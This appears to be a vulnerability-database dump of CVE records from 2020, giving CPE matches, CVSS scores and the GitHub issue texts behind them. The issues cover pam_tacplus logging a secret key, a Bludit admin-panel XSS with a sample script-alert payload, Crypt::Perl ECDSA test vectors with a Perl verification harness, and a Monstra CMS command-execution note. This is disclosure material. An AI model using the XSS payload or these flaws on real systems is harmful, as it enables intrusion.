[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pam_tacplus_project:pam_tacplus:*:*:*:*:*:*:*:*", "matchCriteriaId": "5CBB04E0-1798-4128-B107-EC27FE0CEAAB", "versionEndExcluding": null, "versionEndIncluding": "1.5.1", "versionStartExcluding": null, "versionStartIncluding": "1.3.8", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*", "matchCriteriaId": "902B8056-9E37-443B-8905-8AA93E2447FB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:arista:cloudvision_portal:*:*:*:*:*:*:*:*", "matchCriteriaId": "35B44A14-EADC-4094-AE6E-FA8441CA52FC", "versionEndExcluding": "2020.1.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "532" ]
532
https://github.com/kravietz/pam_tacplus/issues/149
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kravietz", "pam_tacplus" ]
In the example, we can see that server secret key is printed in plain text in journalctl logs. If an attacker is using man-in-the-middle attack and somehow gets these logs, he/she can decrypt and see all packets. User passwords will also be exposed by that.
Printing server secret key in plain text in journalctl
https://api.github.com/repos/kravietz/pam_tacplus/issues/149/comments
12
2020-06-02T16:40:38Z
2020-06-08T12:28:31Z
https://github.com/kravietz/pam_tacplus/issues/149
629,350,947
149
1,261
CVE-2020-13889
2020-06-06T20:15:11.200
showAlert() in the administration panel in Bludit 3.12.0 allows XSS.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bludit/bludit/issues/1205" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bludit/bludit/issues/1205" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bludit:bludit:3.12.0:*:*:*:*:*:*:*", "matchCriteriaId": "6D6D30E3-E730-47C2-BB7F-3C54EB771AFA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/bludit/bludit/issues/1205
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "bludit", "bludit" ]
Hello I think I found a vulnerability. This vulnerability consists in a function called showAlert() in the administration panel of bludit,that when accessed in DOM, allows users define the text to be popped up in the message box. But this function dont have any sanatization and the user can inject any javascript and html code in the page the payload used was: showAlert("<script>alert(1)</script>"); ![XSS Picture](https://github.com/gh0st56/bludit-DOM-xss/blob/master/xss-bludit.jpg) The versions that i tested was the Bludit 3.x. I'll check the old ones for a more in deep report Thank you. https://github.com/gh0st56/bludit-DOM-xss
Possible XSS and HTML injection on admin page.
https://api.github.com/repos/bludit/bludit/issues/1205/comments
1
2020-06-05T01:31:12Z
2020-06-07T10:05:27Z
https://github.com/bludit/bludit/issues/1205
631,247,131
1,205
1,262
CVE-2020-13895
2020-06-07T01:15:10.550
Crypt::Perl::ECDSA in the Crypt::Perl (aka p5-Crypt-Perl) module before 0.32 for Perl fails to verify correct ECDSA signatures when r and s are small and when s = 1. This happens when using the curve secp256r1 (prime256v1). This could conceivably have a security-relevant impact if an attacker wishes to use public r and s values when guessing whether signature verification will fail.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/FGasper/p5-Crypt-Perl/commit/f960ce75502acf7404187231a706672f8369acb2" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/FGasper/p5-Crypt-Perl/issues/14" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/FGasper/p5-Crypt-Perl/commit/f960ce75502acf7404187231a706672f8369acb2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/FGasper/p5-Crypt-Perl/issues/14" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:p5-crypt-perl_project:p5-crypt-perl:*:*:*:*:*:perl:*:*", "matchCriteriaId": "1EEE3CFF-1E10-4097-9BBC-02DF00813008", "versionEndExcluding": "0.32", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "347" ]
347
https://github.com/FGasper/p5-Crypt-Perl/issues/14
[ "Third Party Advisory" ]
github.com
[ "FGasper", "p5-Crypt-Perl" ]
Hello, I'm using Crypt::Perl::ECDSA 0.31: ``` cpan -D Crypt::Perl::ECDSA Database was generated on Thu, 04 Jun 2020 08:41:03 GMT Crypt::Perl::ECDSA ------------------------------------------------------------------------- CPAN: Module::CoreList loaded ok (v5.20181129_28) (no description) F/FE/FELIPE/Crypt-Perl-0.31.tar.gz ECDSA.pm Installed: undef CPAN: undef up to date Felipe Gasper (FELIPE) felipe@cpan.org ``` When using the following test vectors with small r, s and s = 1 from Google Wycheproof: ``` { "algorithm" : "ECDSA", "generatorVersion" : "0.8r12", "numberOfTests" : 387, "header" : [ "Test vectors of type EcdsaVerify are meant for the verification", "of ASN encoded ECDSA signatures." ], "notes" : { "BER" : "This is a signature with correct values for (r, s) but using some alternative BER encoding instead of DER encoding. Implementations should not accept such signatures to limit signature malleability.", "EdgeCase" : "Edge case values such as r=1 and s=0 can lead to forgeries if the ECDSA implementation does not check boundaries and computes s^(-1)==0.", "MissingZero" : "Some implementations of ECDSA and DSA incorrectly encode r and s by not including leading zeros in the ASN encoding of integers when necessary. Hence, some implementations (e.g. jdk) allow signatures with incorrect ASN encodings assuming that the signature is otherwise valid.", "PointDuplication" : "Some implementations of ECDSA do not handle duplication and points at infinity correctly. This is a test vector that has been specially crafted to check for such an omission." }, "schema" : "ecdsa_verify_schema.json", "testGroups" : [ { "key" : { "curve" : "secp256r1", "keySize" : 256, "type" : "EcPublicKey", "uncompressed" : "04a71af64de5126a4a4e02b7922d66ce9415ce88a4c9d25514d91082c8725ac9575d47723c8fbe580bb369fec9c2665d8e30a435b9932645482e7c9f11e872296b", "wx" : "00a71af64de5126a4a4e02b7922d66ce9415ce88a4c9d25514d91082c8725ac957", "wy" : "5d47723c8fbe580bb369fec9c2665d8e30a435b9932645482e7c9f11e872296b" }, "keyDer" : "3059301306072a8648ce3d020106082a8648ce3d03010703420004a71af64de5126a4a4e02b7922d66ce9415ce88a4c9d25514d91082c8725ac9575d47723c8fbe580bb369fec9c2665d8e30a435b9932645482e7c9f11e872296b", "keyPem" : "-----BEGIN PUBLIC KEY-----\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEpxr2TeUSakpOAreSLWbOlBXOiKTJ\n0lUU2RCCyHJayVddR3I8j75YC7Np/snCZl2OMKQ1uZMmRUgufJ8R6HIpaw==\n-----END PUBLIC KEY-----", "sha" : "SHA-256", "type" : "EcdsaVerify", "tests" : [ { "tcId" : 290, "comment" : "small r and s", "msg" : "313233343030", "sig" : "3006020105020101", "result" : "valid", "flags" : [] } ] }, { "key" : { "curve" : "secp256r1", "keySize" : 256, "type" : "EcPublicKey", "uncompressed" : "046627cec4f0731ea23fc2931f90ebe5b7572f597d20df08fc2b31ee8ef16b15726170ed77d8d0a14fc5c9c3c4c9be7f0d3ee18f709bb275eaf2073e258fe694a5", "wx" : "6627cec4f0731ea23fc2931f90ebe5b7572f597d20df08fc2b31ee8ef16b1572", "wy" : "6170ed77d8d0a14fc5c9c3c4c9be7f0d3ee18f709bb275eaf2073e258fe694a5" }, "keyDer" : "3059301306072a8648ce3d020106082a8648ce3d030107034200046627cec4f0731ea23fc2931f90ebe5b7572f597d20df08fc2b31ee8ef16b15726170ed77d8d0a14fc5c9c3c4c9be7f0d3ee18f709bb275eaf2073e258fe694a5", "keyPem" : "-----BEGIN PUBLIC KEY-----\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEZifOxPBzHqI/wpMfkOvlt1cvWX0g\n3wj8KzHujvFrFXJhcO132NChT8XJw8TJvn8NPuGPcJuyderyBz4lj+aUpQ==\n-----END PUBLIC KEY-----", "sha" : "SHA-256", "type" : "EcdsaVerify", "tests" : [ { "tcId" : 291, "comment" : "small r and s", "msg" : "313233343030", "sig" : "3006020105020103", "result" : "valid", "flags" : [] } ] }, { "key" : { "curve" : "secp256r1", "keySize" : 256, "type" : "EcPublicKey", "uncompressed" : "045a7c8825e85691cce1f5e7544c54e73f14afc010cb731343262ca7ec5a77f5bfef6edf62a4497c1bd7b147fb6c3d22af3c39bfce95f30e13a16d3d7b2812f813", "wx" : "5a7c8825e85691cce1f5e7544c54e73f14afc010cb731343262ca7ec5a77f5bf", "wy" : "00ef6edf62a4497c1bd7b147fb6c3d22af3c39bfce95f30e13a16d3d7b2812f813" }, "keyDer" : "3059301306072a8648ce3d020106082a8648ce3d030107034200045a7c8825e85691cce1f5e7544c54e73f14afc010cb731343262ca7ec5a77f5bfef6edf62a4497c1bd7b147fb6c3d22af3c39bfce95f30e13a16d3d7b2812f813", "keyPem" : "-----BEGIN PUBLIC KEY-----\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEWnyIJehWkczh9edUTFTnPxSvwBDL\ncxNDJiyn7Fp39b/vbt9ipEl8G9exR/tsPSKvPDm/zpXzDhOhbT17KBL4Ew==\n-----END PUBLIC KEY-----", "sha" : "SHA-256", "type" : "EcdsaVerify", "tests" : [ { "tcId" : 292, "comment" : "small r and s", "msg" : "313233343030", "sig" : "3006020105020105", "result" : "valid", "flags" : [] } ] }, { "key" : { "curve" : "secp256r1", "keySize" : 256, "type" : "EcPublicKey", "uncompressed" : "04cbe0c29132cd738364fedd603152990c048e5e2fff996d883fa6caca7978c73770af6a8ce44cb41224b2603606f4c04d188e80bff7cc31ad5189d4ab0d70e8c1", "wx" : "00cbe0c29132cd738364fedd603152990c048e5e2fff996d883fa6caca7978c737", "wy" : "70af6a8ce44cb41224b2603606f4c04d188e80bff7cc31ad5189d4ab0d70e8c1" }, "keyDer" : "3059301306072a8648ce3d020106082a8648ce3d03010703420004cbe0c29132cd738364fedd603152990c048e5e2fff996d883fa6caca7978c73770af6a8ce44cb41224b2603606f4c04d188e80bff7cc31ad5189d4ab0d70e8c1", "keyPem" : "-----BEGIN PUBLIC KEY-----\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEy+DCkTLNc4Nk/t1gMVKZDASOXi//\nmW2IP6bKynl4xzdwr2qM5Ey0EiSyYDYG9MBNGI6Av/fMMa1RidSrDXDowQ==\n-----END PUBLIC KEY-----", "sha" : "SHA-256", "type" : "EcdsaVerify", "tests" : [ { "tcId" : 293, "comment" : "small r and s", "msg" : "313233343030", "sig" : "3006020105020106", "result" : "valid", "flags" : [] }, { "tcId" : 294, "comment" : "r is larger than n", "msg" : "313233343030", "sig" : "3026022100ffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632556020106", "result" : "invalid", "flags" : [] } ] }, { "key" : { "curve" : "secp256r1", "keySize" : 256, "type" : "EcPublicKey", "uncompressed" : "044be4178097002f0deab68f0d9a130e0ed33a6795d02a20796db83444b037e13920f13051e0eecdcfce4dacea0f50d1f247caa669f193c1b4075b51ae296d2d56", "wx" : "4be4178097002f0deab68f0d9a130e0ed33a6795d02a20796db83444b037e139", "wy" : "20f13051e0eecdcfce4dacea0f50d1f247caa669f193c1b4075b51ae296d2d56" }, "keyDer" : "3059301306072a8648ce3d020106082a8648ce3d030107034200044be4178097002f0deab68f0d9a130e0ed33a6795d02a20796db83444b037e13920f13051e0eecdcfce4dacea0f50d1f247caa669f193c1b4075b51ae296d2d56", "keyPem" : "-----BEGIN PUBLIC KEY-----\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAES+QXgJcALw3qto8NmhMODtM6Z5XQ\nKiB5bbg0RLA34Tkg8TBR4O7Nz85NrOoPUNHyR8qmafGTwbQHW1GuKW0tVg==\n-----END PUBLIC KEY-----", "sha" : "SHA-256", "type" : "EcdsaVerify", "tests" : [ { "tcId" : 295, "comment" : "s is larger than n", "msg" : "313233343030", "sig" : "3026020105022100ffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc75fbd8", "result" : "invalid", "flags" : [] } ] }, { "key" : { "curve" : "secp256r1", "keySize" : 256, "type" : "EcPublicKey", "uncompressed" : "04d0f73792203716afd4be4329faa48d269f15313ebbba379d7783c97bf3e890d9971f4a3206605bec21782bf5e275c714417e8f566549e6bc68690d2363c89cc1", "wx" : "00d0f73792203716afd4be4329faa48d269f15313ebbba379d7783c97bf3e890d9", "wy" : "00971f4a3206605bec21782bf5e275c714417e8f566549e6bc68690d2363c89cc1" }, "keyDer" : "3059301306072a8648ce3d020106082a8648ce3d03010703420004d0f73792203716afd4be4329faa48d269f15313ebbba379d7783c97bf3e890d9971f4a3206605bec21782bf5e275c714417e8f566549e6bc68690d2363c89cc1", "keyPem" : "-----BEGIN PUBLIC KEY-----\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE0Pc3kiA3Fq/UvkMp+qSNJp8VMT67\nujedd4PJe/PokNmXH0oyBmBb7CF4K/XidccUQX6PVmVJ5rxoaQ0jY8icwQ==\n-----END PUBLIC KEY-----", "sha" : "SHA-256", "type" : "EcdsaVerify", "tests" : [ { "tcId" : 296, "comment" : "small r and s^-1", "msg" : "313233343030", "sig" : "3027020201000221008f1e3c7862c58b16bb76eddbb76eddbb516af4f63f2d74d76e0d28c9bb75ea88", "result" : "valid", "flags" : [] } ] }, { "key" : { "curve" : "secp256r1", "keySize" : 256, "type" : "EcPublicKey", "uncompressed" : "044838b2be35a6276a80ef9e228140f9d9b96ce83b7a254f71ccdebbb8054ce05ffa9cbc123c919b19e00238198d04069043bd660a828814051fcb8aac738a6c6b", "wx" : "4838b2be35a6276a80ef9e228140f9d9b96ce83b7a254f71ccdebbb8054ce05f", "wy" : "00fa9cbc123c919b19e00238198d04069043bd660a828814051fcb8aac738a6c6b" }, "keyDer" : "3059301306072a8648ce3d020106082a8648ce3d030107034200044838b2be35a6276a80ef9e228140f9d9b96ce83b7a254f71ccdebbb8054ce05ffa9cbc123c919b19e00238198d04069043bd660a828814051fcb8aac738a6c6b", "keyPem" : "-----BEGIN PUBLIC KEY-----\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAESDiyvjWmJ2qA754igUD52bls6Dt6\nJU9xzN67uAVM4F/6nLwSPJGbGeACOBmNBAaQQ71mCoKIFAUfy4qsc4psaw==\n-----END PUBLIC KEY-----", "sha" : "SHA-256", "type" : "EcdsaVerify", "tests" : [ { "tcId" : 297, "comment" : "smallish r and s^-1", "msg" : "313233343030", "sig" : "302c02072d9b4d347952d6022100ef3043e7329581dbb3974497710ab11505ee1c87ff907beebadd195a0ffe6d7a", "result" : "valid", "flags" : [] } ] }, { "key" : { "curve" : "secp256r1", "keySize" : 256, "type" : "EcPublicKey", "uncompressed" : "047393983ca30a520bbc4783dc9960746aab444ef520c0a8e771119aa4e74b0f64e9d7be1ab01a0bf626e709863e6a486dbaf32793afccf774e2c6cd27b1857526", "wx" : "7393983ca30a520bbc4783dc9960746aab444ef520c0a8e771119aa4e74b0f64", "wy" : "00e9d7be1ab01a0bf626e709863e6a486dbaf32793afccf774e2c6cd27b1857526" }, "keyDer" : "3059301306072a8648ce3d020106082a8648ce3d030107034200047393983ca30a520bbc4783dc9960746aab444ef520c0a8e771119aa4e74b0f64e9d7be1ab01a0bf626e709863e6a486dbaf32793afccf774e2c6cd27b1857526", "keyPem" : "-----BEGIN PUBLIC KEY-----\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEc5OYPKMKUgu8R4PcmWB0aqtETvUg\nwKjncRGapOdLD2Tp174asBoL9ibnCYY+akhtuvMnk6/M93Tixs0nsYV1Jg==\n-----END PUBLIC KEY-----", "sha" : "SHA-256", "type" : "EcdsaVerify", "tests" : [ { "tcId" : 298, "comment" : "100-bit r and small s^-1", "msg" : "313233343030", "sig" : "3032020d1033e67e37b32b445580bf4eff0221008b748b74000000008b748b748b748b7466e769ad4a16d3dcd87129b8e91d1b4d", "result" : "valid", "flags" : [] } ] }, { "key" : { "curve" : "secp256r1", "keySize" : 256, "type" : "EcPublicKey", "uncompressed" : "045ac331a1103fe966697379f356a937f350588a05477e308851b8a502d5dfcdc5fe9993df4b57939b2b8da095bf6d794265204cfe03be995a02e65d408c871c0b", "wx" : "5ac331a1103fe966697379f356a937f350588a05477e308851b8a502d5dfcdc5", "wy" : "00fe9993df4b57939b2b8da095bf6d794265204cfe03be995a02e65d408c871c0b" }, "keyDer" : "3059301306072a8648ce3d020106082a8648ce3d030107034200045ac331a1103fe966697379f356a937f350588a05477e308851b8a502d5dfcdc5fe9993df4b57939b2b8da095bf6d794265204cfe03be995a02e65d408c871c0b", "keyPem" : "-----BEGIN PUBLIC KEY-----\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEWsMxoRA/6WZpc3nzVqk381BYigVH\nfjCIUbilAtXfzcX+mZPfS1eTmyuNoJW/bXlCZSBM/gO+mVoC5l1AjIccCw==\n-----END PUBLIC KEY-----", "sha" : "SHA-256", "type" : "EcdsaVerify", "tests" : [ { "tcId" : 299, "comment" : "small r and 100 bit s^-1", "msg" : "313233343030", "sig" : "302702020100022100ef9f6ba4d97c09d03178fa20b4aaad83be3cf9cb824a879fec3270fc4b81ef5b", "result" : "valid", "flags" : [] } ] }, { "key" : { "curve" : "secp256r1", "keySize" : 256, "type" : "EcPublicKey", "uncompressed" : "041d209be8de2de877095a399d3904c74cc458d926e27bb8e58e5eae5767c41509dd59e04c214f7b18dce351fc2a549893a6860e80163f38cc60a4f2c9d040d8c9", "wx" : "1d209be8de2de877095a399d3904c74cc458d926e27bb8e58e5eae5767c41509", "wy" : "00dd59e04c214f7b18dce351fc2a549893a6860e80163f38cc60a4f2c9d040d8c9" }, "keyDer" : "3059301306072a8648ce3d020106082a8648ce3d030107034200041d209be8de2de877095a399d3904c74cc458d926e27bb8e58e5eae5767c41509dd59e04c214f7b18dce351fc2a549893a6860e80163f38cc60a4f2c9d040d8c9", "keyPem" : "-----BEGIN PUBLIC KEY-----\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEHSCb6N4t6HcJWjmdOQTHTMRY2Sbi\ne7jljl6uV2fEFQndWeBMIU97GNzjUfwqVJiTpoYOgBY/OMxgpPLJ0EDYyQ==\n-----END PUBLIC KEY-----", "sha" : "SHA-256", "type" : "EcdsaVerify", "tests" : [ { "tcId" : 300, "comment" : "100-bit r and s^-1", "msg" : "313233343030", "sig" : "3032020d062522bbd3ecbe7c39e93e7c25022100ef9f6ba4d97c09d03178fa20b4aaad83be3cf9cb824a879fec3270fc4b81ef5b", "result" : "valid", "flags" : [] } ] }, { "key" : { "curve" : "secp256r1", "keySize" : 256, "type" : "EcPublicKey", "uncompressed" : "04083539fbee44625e3acaafa2fcb41349392cef0633a1b8fabecee0c133b10e99915c1ebe7bf00df8535196770a58047ae2a402f26326bb7d41d4d7616337911e", "wx" : "083539fbee44625e3acaafa2fcb41349392cef0633a1b8fabecee0c133b10e99", "wy" : "00915c1ebe7bf00df8535196770a58047ae2a402f26326bb7d41d4d7616337911e" }, "keyDer" : "3059301306072a8648ce3d020106082a8648ce3d03010703420004083539fbee44625e3acaafa2fcb41349392cef0633a1b8fabecee0c133b10e99915c1ebe7bf00df8535196770a58047ae2a402f26326bb7d41d4d7616337911e", "keyPem" : "-----BEGIN PUBLIC KEY-----\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAECDU5++5EYl46yq+i/LQTSTks7wYz\nobj6vs7gwTOxDpmRXB6+e/AN+FNRlncKWAR64qQC8mMmu31B1NdhYzeRHg==\n-----END PUBLIC KEY-----", "sha" : "SHA-256", "type" : "EcdsaVerify", "tests" : [ { "tcId" : 301, "comment" : "r and s^-1 are close to n", "msg" : "313233343030", "sig" : "3045022100ffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc6324d50220555555550000000055555555555555553ef7a8e48d07df81a693439654210c70", "result" : "valid", "flags" : [] } ] }, { "key" : { "curve" : "secp256r1", "keySize" : 256, "type" : "EcPublicKey", "uncompressed" : "048aeb368a7027a4d64abdea37390c0c1d6a26f399e2d9734de1eb3d0e1937387405bd13834715e1dbae9b875cf07bd55e1b6691c7f7536aef3b19bf7a4adf576d", "wx" : "008aeb368a7027a4d64abdea37390c0c1d6a26f399e2d9734de1eb3d0e19373874", "wy" : "05bd13834715e1dbae9b875cf07bd55e1b6691c7f7536aef3b19bf7a4adf576d" }, "keyDer" : "3059301306072a8648ce3d020106082a8648ce3d030107034200048aeb368a7027a4d64abdea37390c0c1d6a26f399e2d9734de1eb3d0e1937387405bd13834715e1dbae9b875cf07bd55e1b6691c7f7536aef3b19bf7a4adf576d", "keyPem" : "-----BEGIN PUBLIC KEY-----\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEius2inAnpNZKveo3OQwMHWom85ni\n2XNN4es9Dhk3OHQFvRODRxXh266bh1zwe9VeG2aRx/dTau87Gb96St9XbQ==\n-----END PUBLIC KEY-----", "sha" : "SHA-256", "type" : "EcdsaVerify", "tests" : [ { "tcId" : 302, "comment" : "s == 1", "msg" : "313233343030", "sig" : "30250220555555550000000055555555555555553ef7a8e48d07df81a693439654210c70020101", "result" : "valid", "flags" : [] } ] } ] } ``` with the prime256v1 curve, I'm getting this output: ``` Parsing... [*] Test: 290 Result: FAIL ERROR: Can't locate object method "is_positive" via package "5" (perhaps you forgot to load "5"?) at /home/vmr/perl5/lib/perl5/Crypt/Perl/ECDSA/KeyBase.pm line 219. [*] Test: 291 Result: FAIL ERROR: Can't locate object method "is_positive" via package "5" (perhaps you forgot to load "5"?) at /home/vmr/perl5/lib/perl5/Crypt/Perl/ECDSA/KeyBase.pm line 219. [*] Test: 292 Result: FAIL ERROR: Can't locate object method "is_positive" via package "5" (perhaps you forgot to load "5"?) at /home/vmr/perl5/lib/perl5/Crypt/Perl/ECDSA/KeyBase.pm line 219. [*] Test: 293 Result: FAIL ERROR: Can't locate object method "is_positive" via package "5" (perhaps you forgot to load "5"?) at /home/vmr/perl5/lib/perl5/Crypt/Perl/ECDSA/KeyBase.pm line 219. [*] Test: 294 Result: PASS ERROR: Can't locate object method "is_positive" via package "6" (perhaps you forgot to load "6"?) at /home/vmr/perl5/lib/perl5/Crypt/Perl/ECDSA/KeyBase.pm line 219. [*] Test: 295 Result: PASS ERROR: Can't locate object method "is_positive" via package "5" (perhaps you forgot to load "5"?) at /home/vmr/perl5/lib/perl5/Crypt/Perl/ECDSA/KeyBase.pm line 219. [*] Test: 296 Result: FAIL ERROR: Can't locate object method "is_positive" via package "256" (perhaps you forgot to load "256"?) at /home/vmr/perl5/lib/perl5/Crypt/Perl/ECDSA/KeyBase.pm line 219. [*] Test: 297 Result: PASS [*] Test: 298 Result: PASS [*] Test: 299 Result: FAIL ERROR: Can't locate object method "is_positive" via package "256" (perhaps you forgot to load "256"?) at /home/vmr/perl5/lib/perl5/Crypt/Perl/ECDSA/KeyBase.pm line 219. [*] Test: 300 Result: PASS [*] Test: 301 Result: PASS [*] Test: 302 Result: FAIL ERROR: Can't locate object method "is_positive" via package "1" (perhaps you forgot to load "1"?) at /home/vmr/perl5/lib/perl5/Crypt/Perl/ECDSA/KeyBase.pm line 219. ``` which can be verified with this proof of concept: ``` #!/usr/bin/env perl use Crypt::Perl::ECDSA; use Crypt::Perl::ECDSA::Generate; use Crypt::Perl::ECDSA::Parse; use Digest::SHA; use JSON; use File::Slurp; use strict; use warnings; my $file_content = read_file('poc_ecdsa_secp256r1_sha256_test.json'); my $json = JSON->new; my $data = $json->decode($file_content); print("Parsing...\n"); my $aref = $data->{testGroups}; for my $element (@$aref) { my $public = Crypt::Perl::ECDSA::Parse::public($element->{keyPem}); my $bref = $element->{tests}; for my $test (@$bref) { print("[*] Test: " . $test->{tcId} . "\n"); my $msg_bytes = pack "H*", $test->{msg}; my $sig_bytes = pack "H*", $test->{sig}; my $hash = Digest::SHA::sha256($msg_bytes); eval { my $result = $public->verify($hash, $sig_bytes); if ($result == 1) { if ($test->{result} eq "valid" || $test->{result} eq "acceptable") { print("Result: PASS\n"); } else { print("Result: FAIL\n") } } else { if ($test->{result} eq "valid" || $test->{result} eq "acceptable") { print("Result: FAIL\n"); } else { print("Result: PASS\n") } } } or do { if ($test->{result} eq "valid" || $test->{result} eq "acceptable") { print("Result: FAIL\n"); } else { print("Result: PASS\n") } my $error = $@ || 'Unknown failure'; print("ERROR: " . $error); } } } ``` Best regards, Antonio
Crypt::Perl::ECDSA fails to verify ECDSA signatures when r and s are small and when s = 1
https://api.github.com/repos/FGasper/p5-Crypt-Perl/issues/14/comments
4
2020-06-04T10:07:35Z
2020-06-07T07:42:13Z
https://github.com/FGasper/p5-Crypt-Perl/issues/14
630,689,834
14
1,263
CVE-2020-13978
2020-06-09T14:15:10.140
Monstra CMS 3.0.4 allows an attacker, who already has administrative access to modify .chunk.php files on the Edit Chunk screen, to execute arbitrary OS commands via the Theme Module by visiting the admin/index.php?id=themes&action=edit_chunk URI. NOTE: there is no indication that the Edit Chunk feature was intended to prevent an administrator from using PHP's exec feature
